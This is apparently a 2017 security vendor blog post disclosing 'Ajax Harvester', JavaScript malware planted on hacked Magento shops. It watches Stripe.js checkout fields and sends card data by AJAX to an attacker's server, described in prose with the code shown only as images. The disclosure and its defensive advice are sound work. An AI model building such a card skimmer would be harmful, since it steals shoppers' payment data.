logo.png
Guided Website Threat Review

Foregenix Blog

Mike Hinton

New JavaScript Malware Targeting Stripe.js on Magento Websites - Ajax Harvester

web security, Magento, malware, JavaScript

,04/04/17 07:53

The Foregenix DFIR team has discovered what is believed to be a unreported piece of malware which has recently been used to target insecure eCommerce websites processing through Stripe, running on the Magento framework.

The Malware

Dubbed ‘Ajax Harvester’ by analysts, the malware is a piece of JavaScript which, when inserted into a compromised site, waits until a Magento payment page is visited. It specifically looks for payment pages using the One Page, CheckoutSuite, One Step Checkout and Fire Checkout page titles, as shown below.

Ajax Harvester - Stripe 1.png

If a payment page is identified it calls a further JavaScript (in this instance named ‘extra.js’) which searches for input fields specifically related to the now deprecated, although still widely used, ‘stripe.js’ Magento payment integration. Some of the malicious code is shown below.

Ajax Harvester - Stripe 2.png

Although the malware is not unique in its functionality it does mean users could have their credit card data stolen even before they have pressed the checkout button. Rather than harvesting code to a local harvest file for later retrieval by the attacker, it immediately posts the data using a JQuery AJAX function to an external server controlled by the attacker as soon as values have been entered into an input field. 

What does make the malware distinct is the fact that it is directly targeting the Stripe.js code for Magento. 

Prevention

This attack is only possible when a website is insecure - just to be clear, while this attack focuses on the Stripe.js integration for Magento, it can only take place when the website itself has been hacked.  Preventing this attack therefore requires a website administrator/web developer to keep the website secure.  Here's an article we recently wrote on Securing Your Magento Website.

Detection

In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.

You can detect these by using a free Guided Threat Review from the Foregenix team. 

Guided Website Threat Review

 

TRENDING POSTS

Duncan Slater
Alert: Major UK Payment Service Provider iFrame Man-In-The-Middle Breach

The Foregenix Digital Forensics and Incident Response Team recently reported a man-in-the-middle ...

Read More
Kirsty Trainer
The "Key" to Secure Data - P2PE - Derived Unique Key Per Transaction (DUKPT)

Written by Andrew McKenna, PCI QSA, PCIP at Foregenix The encryption key infrastructure usually ...

Read More

Cyber Security Insights

Duncan Slater
26/05/17 14:08

“Mind the Gap” – As a Small eCommerce Business, Who is Responsible for Your Security?

  Major corporations spend hundreds of thousands of pounds and in some cases employ teams of people dedicated to manage and ensure the security of ...

Read More

Kirsty Trainer
23/05/17 10:48

8 Critical Steps to Reduce the Risk of Ransomware Infection

The WannaCry ransomware infestation is a wake-up call for all entities connected to public networks, such as the internet, to recognise ...

Read More

Mike Hinton
16/05/17 17:24

Foregenix announce new partnership with Juno Web Design

We’re delighted to announce a new partnership between ourselves and Nottinghamshire based agency ‘Juno’. With the rapidly increasing threat to ...

Read More

Kirsty Trainer
05/05/17 09:42

Foregenix choose Australia as launch pad for Asia Pacific expansion

Foregenix are setting-up a new base in Australia, targetting the Asia Pacific region for growth. The new office in Sydney will open in May and be ...

Read More

Kirsty Trainer
11/04/17 12:03

New survey shows 78% of eCommerce websites at risk

47,000 out of 60,000 websites missing critical security patches Over 3,000 are already hacked and losing customer data now External security scans ...

Read More